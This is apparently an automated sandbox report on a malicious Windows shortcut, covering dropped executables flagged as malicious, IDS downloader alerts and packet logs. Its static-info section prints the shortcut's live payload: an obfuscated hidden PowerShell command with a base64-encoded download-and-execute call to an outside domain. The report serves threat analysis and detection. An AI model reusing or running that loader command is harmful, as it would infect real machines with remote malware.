                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_fcbx5xjd.qgp.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_hr2gv04l.ktg.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_pla2db0t.sd3.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_rjvabyne.ez1.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_wk12jonp.iug.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_xs4q5un3.ct5.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Windows\Temp\deviceId.txt

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):37
                                                                                  Entropy (8bit):4.229327351940021
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:4yHbkT/dkcovn:dbkRsn
                                                                                  MD5:17D74848A2AABEDAF9A3BF09D7CF3A2B
                                                                                  SHA1:056C4F9329C07DD7A3414257E1D77D41D4C402C5
                                                                                  SHA-256:AEF31441A868B517503CE23E6D663969A50CAC256CA3311CCD17EE1AE11D5C26
                                                                                  SHA-512:8A0C39EACAEA374E904A931F97D8C32C1BABCB47763195979D93AEA366624B304F6B0B25CB8CBFDE5B56AA129CFC9B51B3BAA697149295A103A53D9E5139E580
                                                                                  Malicious:false
                                                                                  Preview:.63013372F6575A9D4EA29CB608798ED9..

                                                                                  C:\Windows\Temp\file

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):8351232
                                                                                  Entropy (8bit):6.870213524632391
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:c6ELl9Xn8eQO54RgwIL6gTayjL9rjX27v/tIDZaFaOgj:c6EHXBQbRE5Tayjhrj2QaFaOS
                                                                                  MD5:0F611184B8A15C73AD43B82BDE807849
                                                                                  SHA1:4FBE94B19F1C69BA5ED4EF6DE134FAEC1B5B7270
                                                                                  SHA-256:2E77D02BBB8C853FE46B0CDC0D98A96CEF2C3DCB58CD98906CB1A2306F3213A4
                                                                                  SHA-512:C02A1D9646C662AFBD722F67AE141B6C8B75417AB800A605E085A02B95AECE0372CC8BFB5931820D586928E1A2F0EC5BFA56DA8C7E7B7204FAA8ECF2ABD63C29
                                                                                  Malicious:false
                                                                                  Preview:L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e......f..........#....(..F..G8...............A.............................q............a..........................................)..Y...i)..U....A.......q..E............Q......1...........................).....A.............^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`ude......F........................./se`u`..]>3...^..A3...F.............A..A/e`u`........Q...o....{.............A.../qe`u`..E....q........{.............A..A/srsb........A.......W~.............A..A/sdmnb.......Q.......]~.............A..C........................................................................................................................................................................................

                                                                                  C:\Windows\Temp\log_rdp_08112024_04.txt

                                                                                  Download File
                                                                                  Process:C:\Windows\Temp\myRdpService.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):380
                                                                                  Entropy (8bit):4.482780983572178
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:KabWKAXI4WcdB4wcdqWA35TAXI4WcdB4wcdqWAJAXI4WcdB4wcdqWAbAXI4WcdBV:MKAXxWMrWA35TAXxWMrWAJAXxWMrWAbs
                                                                                  MD5:0BDF043DD06E5029E7500771E7E58A3F
                                                                                  SHA1:606076F5BCA9B1C4E641E8BEAB659EF6A5DCF262
                                                                                  SHA-256:36115C4A8063ADA2A2A168CA96C194D75E64B9424D51A4A0EE23C7BB3946FF9B
                                                                                  SHA-512:215EC008186B8EF6C95A5893E5551F9C842530B360B928321A9B5D3FF640F80A2A05CFB529EC27815886D1A7D41DECB9E03C4A9ADCBF56ECA0002320F8F45D1E
                                                                                  Malicious:false
                                                                                  Preview:16:42:28 - Internet connection..16:42:39 - The server returned status code '404' when status code '101' was expected...16:42:42 - The server returned status code '404' when status code '101' was expected...16:42:55 - The server returned status code '404' when status code '101' was expected...16:42:57 - The server returned status code '404' when status code '101' was expected...

                                                                                  C:\Windows\Temp\myRdpService.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\Temp\svczHost.exe
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):9427456
                                                                                  Entropy (8bit):6.890384949334134
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:FagXMQc5xC9yZAaynfX9lvlJIg/EX4AAXC06GM3NOC02kf:DXMNYyGft7JIg/dAAXkGcu2
                                                                                  MD5:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                  SHA1:44C482F52EE997816D2582CF1D1C0A5295BA8DC9
                                                                                  SHA-256:5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
                                                                                  SHA-512:4BDA0642A063BFE3B86FF97C2F7500910BEA416507B9814C0DDAC0631B1B30ED47DCC6E22752B6566353B4F7386522A6E3C104B3EB055C5BA938522ED095B429
                                                                                  Malicious:true
                                                                                  Joe Sandbox View:
                                                                                  • Filename: ZGMW2wgPzY.lnk, Detection: malicious, Browse
                                                                                  • Filename: z0gG2GA9vG.lnk, Detection: malicious, Browse
                                                                                  • Filename: About-Us.docx lnk.lnk, Detection: malicious, Browse
                                                                                  • Filename: Job-Description pdf lnk.lnk, Detection: malicious, Browse
                                                                                  • Filename: 6GMmnAcpMs.lnk, Detection: malicious, Browse
                                                                                  • Filename: Meeting-Registration pdf lnk.lnk, Detection: malicious, Browse
                                                                                  • Filename: Mediatool-media-planning-guide lnk.lnk, Detection: malicious, Browse
                                                                                  • Filename: K9ZFXlZRuI.lnk, Detection: malicious, Browse
                                                                                  • Filename: H71PKTiNjk.lnk, Detection: malicious, Browse
                                                                                  • Filename: U7LTwStlEf.lnk, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d...UR+g.........."....).:P...A................@.............................@............`...................................................|........................... ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managed..C..`....C..L.............. ..`hydrated.....`P..........................rdata..pq9...l..r9..>P.............@..@.data....x..........................@....pdata..............6..............@..@.rsrc...............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

                                                                                  C:\Windows\Temp\svczHost.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):8351232
                                                                                  Entropy (8bit):6.8702135246323905
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:3qyaZJr8q0SLK/1JQv6udEr3onGwuNztOqZ+:6BgqrKNwvdK3iGwgOqZ
                                                                                  MD5:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                  SHA1:B53BD3683487B873D1D4D0077C432698702CC347
                                                                                  SHA-256:41310862773697FF00306B143FFDA60C87D2EA4E44774289F1F2ED0E74D2CF1B
                                                                                  SHA-512:E7FC0571CB0BA516794A52A3277D3CB15049FFB739EBC203D80E6F9FCD08F6B5848AF470BA0F082A3D039472A83ED87512C0E4750946406649097C097EECFF40
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d......g.........."....)..G..F9...............@.............................p............`..........................................(..X...h(..T....@.......p..D............P......0...........................(.......@............._..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydrated......G..........................rdata..\?2..._..@2...G.............@..@.data........P...n....z.............@....pdata..D....p........z.............@..@.rsrc........@.......V..............@..@.reloc.......P.......\..............@..B........................................................................................................................................................................................

                                                                                  \Device\ConDrv

                                                                                  Download File
                                                                                  Process:C:\Windows\Temp\svczHost.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):68
                                                                                  Entropy (8bit):4.9006507176586105
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:eDLpHWf0wUWdhtq1OKxxT6:eDLp2f0cdht6dT6
                                                                                  MD5:D52B11282D0B03B45BCBA513920D8580
                                                                                  SHA1:17B3D406D2CE34F101DE1C7AFF80E6F0D2CF8B47
                                                                                  SHA-256:7E3853B246BEFFE1380C7DAC9D283213D8DA26D8475CEE816DB9D041836D1961
                                                                                  SHA-512:4E85DCBE75BC320A8B9ECAADC813E5AD3D5BC36E3157418533856EF1EB0AD61738D1CE239310B776E09EC6EA1957B2E711A936B8BAA91E718C848302C8A23301
                                                                                  Malicious:false
                                                                                  Preview:Begin download https://uyt1n8ded9fb380.com/StaticFile/RdpService/2..

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=347, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                  Entropy (8bit):8.417871661406904E-4
                                                                                  TrID:
                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                  File name:U82W1yZAYQ.lnk
                                                                                  File size:17'825'792 bytes
                                                                                  MD5:84f772fa4275d74d461040a5ccfc5495
                                                                                  SHA1:256927916a8fb5104bb8d8212b29612ba399164e
                                                                                  SHA256:61a836854f32b7bc4d18564cf1447be068795df7f2d47034d95f48f971fb60d7
                                                                                  SHA512:23d2569da6db902a7cd79615f6c4c10bd934822bd0dcb8b2ecba45523948fe528bb6f3319ab706fbce156d639eb453959d1e82ea344aec4819c533cba0547da2
                                                                                  SSDEEP:48:8ic48iSKAAmB5G0qo34A+5MwJDrOcUVQkCLkVWlInx4OqI:8icmSK9u00qHOwJyxCQVWlwOh
                                                                                  TLSH:8F07280019FA00CAF223AB366BFCF1B69275F4A4183EA1F456418A594B71A84D833B72
                                                                                  File Content Preview:L..................F.B..................................[.......................1./.v. ./.k. .".S.^.T.^.a.R.^.T. ./.M.^.I.^.n. .".". .P.^.o.W.e.r.^.s.^.H.^.e.L.^.l. .-.W. .H.^.i.D.d.e.^.n. .-.N.o.^.l.^.O.G.O. .-.N.^.o.^.p. .-.e.p. .B.^.Y.P.A.^.s.S. .-.e.N

                                                                                  File Icon

                                                                                  Icon Hash:69e9a9a9a3a3a1a5

                                                                                  Static Windows Shortcut Info

                                                                                  General

                                                                                  Relative Path:
                                                                                  Command Line Argument:/v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit
                                                                                  Icon location:%SystemRoot%\System32\imageres.dll

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-08T10:40:53.549959+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049715104.21.86.219443TCP
                                                                                  2024-11-08T10:40:55.792835+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049717104.21.86.219443TCP
                                                                                  2024-11-08T10:40:57.872596+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049719104.21.86.219443TCP
                                                                                  2024-11-08T10:41:20.575030+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049732104.21.86.219443TCP
                                                                                  2024-11-08T10:42:16.847415+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049738104.21.86.219443TCP
                                                                                  2024-11-08T10:42:17.579945+01002810946ETPRO MALWARE Banload DLL Encoded Request1104.21.86.219443192.168.11.2049738TCP
                                                                                  2024-11-08T10:43:05.095153+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049744104.21.86.219443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 8, 2024 10:40:49.954662085 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:49.954689980 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:49.954858065 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:49.963592052 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:49.963701010 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.189165115 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.189383030 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:50.192306042 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:50.192317963 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.193466902 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.199497938 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:50.240014076 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.996690035 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.996722937 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.996767998 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:50.996978045 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:50.996989965 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:51.042820930 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:51.238254070 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:51.238320112 CET44349714104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:51.238526106 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:51.244996071 CET49714443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:52.536267996 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:52.536297083 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:52.536470890 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:52.536870956 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:52.536881924 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:52.748301983 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:52.749839067 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:52.749850035 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.549968004 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.549997091 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.550060034 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.550096989 CET44349715104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.550206900 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.550307035 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.572861910 CET49715443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.707230091 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.707248926 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.707416058 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.707595110 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.707600117 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.932488918 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.933346987 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.933355093 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:53.933569908 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:53.933577061 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.741499901 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.741559982 CET44349716104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.741820097 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.742050886 CET49716443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.779031992 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.779046059 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.779187918 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.779580116 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.779584885 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.990995884 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:54.991903067 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:54.991910934 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.792826891 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.792886972 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.792936087 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.792993069 CET44349717104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.793103933 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.793298960 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.804372072 CET49717443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.824681044 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.824700117 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:55.824939013 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.825150967 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:55.825160980 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.034559965 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.035729885 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.035741091 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.036019087 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.036026955 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.838068962 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.838110924 CET44349718104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.838311911 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.838681936 CET49718443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.856149912 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.856168032 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:56.856328011 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.856723070 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:56.856731892 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.066551924 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.067955971 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:57.067966938 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872555017 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872596979 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872663975 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872684956 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872771025 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:57.872780085 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:57.872890949 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:57.916256905 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.118618011 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.118644953 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.118805885 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.118814945 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.119199038 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.119236946 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.119338036 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.119409084 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.119417906 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.119523048 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.119622946 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.119645119 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.166172981 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.365278959 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.365554094 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.365595102 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.365775108 CET44349719104.21.86.219192.168.11.20
                                                                                  Nov 8, 2024 10:40:58.365789890 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.365942001 CET49719443192.168.11.20104.21.86.219
                                                                                  Nov 8, 2024 10:40:58.376276970 CET49719443192.168.11.20104.21.86.219
